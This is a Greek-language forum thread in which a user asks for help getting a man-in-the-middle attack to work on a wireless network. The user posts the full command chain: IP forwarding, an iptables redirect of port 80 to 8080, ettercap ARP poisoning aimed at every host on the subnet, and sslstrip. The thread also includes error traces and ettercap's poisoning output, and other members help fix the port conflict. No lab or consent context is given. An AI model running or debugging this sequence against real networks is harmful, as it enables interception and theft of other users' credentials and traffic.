bacos Δημοσ. 17 Αυγούστου 2011 Share Δημοσ. 17 Αυγούστου 2011 καλησπερα εχω ενα προβληαμα χρησημοπιο το ettercap μεσα απο consola και μου βγαζει αυτο το EROR SEND L3 ERROR: 62 byte packet (0800:11) destined to 192.168.1.1 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted) ) τι δεν κανω καλα? Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
jim_p Δημοσ. 17 Αυγούστου 2011 Share Δημοσ. 17 Αυγούστου 2011 Το τρεχεις με δικαιωματα root? Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
bacos Δημοσ. 17 Αυγούστου 2011 Μέλος Share Δημοσ. 17 Αυγούστου 2011 ναι κανονικα παταω στην κονσολα sudo su και μετα βαζω τις εντολες και μου βγαζει αυτο :? SEND L3 ERROR: 62 byte packet (0800:11) destined to 192.168.1.1 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted) ) Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
jim_p Δημοσ. 17 Αυγούστου 2011 Share Δημοσ. 17 Αυγούστου 2011 Το "sudo su" ειναι λαθος. Ή θα δωσεις "sudo εντολη" + τον κωδικο σου και θα στην τρεξει εφοσον ο χρηστης σου μπορει να κανει sudo (ειναι στο group του sudo) ή su + τον κωδικο του root και μετα την εντολη για να γινεις πρωτα root. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
bacos Δημοσ. 17 Αυγούστου 2011 Μέλος Share Δημοσ. 17 Αυγούστου 2011 τα ιδια παντελη τα ιδια παντελη μου λοιπον παλια δουλευε τωρα που πειρα καινουργιο λαπτοπ και του εβαλα τα ubuntu 10.04 δεν δουλευει βαζω της εντολες : ανοιγω τερματικο βαζω 1)sudo echo "1" > /proc/sys/net/ipv4/ip_forward 2)sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 3)sudo ettercap -TqM arp:REMOTE // // -i wlan0 4)sudo sslstrip -a -l 8080 και στην εντολη 4) μου βγαζει αυτο το sslstrip -a -l 8080 Traceback (most recent call last): File "/usr/local/bin/sslstrip", line 108, in <module> main(sys.argv[1:]) File "/usr/local/bin/sslstrip", line 101, in main reactor.listenTCP(int(listenPort), strippingFactory) File "/usr/lib/python2.6/dist-packages/twisted/internet/posixbase.py", line 346, in listenTCP p.startListening() File "/usr/lib/python2.6/dist-packages/twisted/internet/tcp.py", line 855, in startListening raise CannotListenError, (self.interface, self.port, le) twisted.internet.error.CannotListenError: Couldn't listen on any:8080: [Errno 98] Address already in use. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
NullScan Δημοσ. 17 Αυγούστου 2011 Share Δημοσ. 17 Αυγούστου 2011 Χρησιμοποιεί την πόρτα 8080 ο proxy ή ο web server σου και το sslstrip δέν μπορεί να την κάνει bind για να σου δείξει το incomming connection. Δοκίμασε σε μιά άλλη πόρτα, το ίδιο αποτέλεσμα θα δείς με το να κατάφερνες να κάνεις bind στην 8080 EDIT: >netstat -an | grep 8080 για να δείς ποιό πρόγραμμα έχει κάνει claim αυτή τη πόρτα. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
mphxths Δημοσ. 17 Αυγούστου 2011 Share Δημοσ. 17 Αυγούστου 2011 Το "sudo su" ειναι λαθος. Ή θα δωσεις "sudo εντολη" + τον κωδικο σου και θα στην τρεξει εφοσον ο χρηστης σου μπορει να κανει sudo (ειναι στο group του sudo) ή su + τον κωδικο του root και μετα την εντολη για να γινεις πρωτα root. ισχυει αυτο που λες ,αλλα πολλες διανομες δεν οριζουν εξαρχης κωδικο για τον root. ως εκ τουτου με su τρως πορτα. οποτε ειτε θα κανεις 1.sudo su (αρα θα βαλεις το δικο σου pass , no need για τον κωδικο του root) 2.sudo passwd root (για να θεσεις κωδικο στον root , και να κανεις μετα σαν ανθρωπος "su -") γνωμη μου οσα λιγοτερο sudo su ή su κανει ενας μεσος χρηστης τοσο καλυτερα για το συστημα , καλυτερα να μεινει στο sudo + εντολη. Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
bacos Δημοσ. 18 Αυγούστου 2011 Μέλος Share Δημοσ. 18 Αυγούστου 2011 παιδια πρεπει να βρηκα ποιο ειναι το προβλημα οταν βαζω την εντολη αυτη : ettercap -TqM arp:REMOTE // // -i wlan0 κοιταχτε τη μου βγαζει ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA Dissector "dns" not supported (etter.conf line 70)--------------------------------------------------)ΜΗΠΩς ΕΙΝΑΙ ΕΔΩ ΤΟ ΠΡΟΒΛΗΜΑ????????????? Listening on wlan0... (Ethernet) wlan0 -> 00:19:CB:22:29:D0 192.168.1.01 255.255.255.0 Privileges dropped to UID 65534 GID 65534... 28 plugins 39 protocol dissectors 53 ports monitored 7587 mac vendor fingerprint 1698 tcp OS fingerprint 2183 known services Randomizing 255 hosts for scanning... Scanning the whole netmask for 255 hosts... * |==================================================>| 100.00 % 3 hosts added to the hosts list... ARP poisoning victims: GROUP 1 : ANY (all the hosts in the list) GROUP 2 : ANY (all the hosts in the list) Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help Συνδέστε για να σχολιάσετε Κοινοποίηση σε άλλες σελίδες άλλες επιλογές
Προτεινόμενες αναρτήσεις
Αρχειοθετημένο
Αυτό το θέμα έχει αρχειοθετηθεί και είναι κλειστό για περαιτέρω απαντήσεις.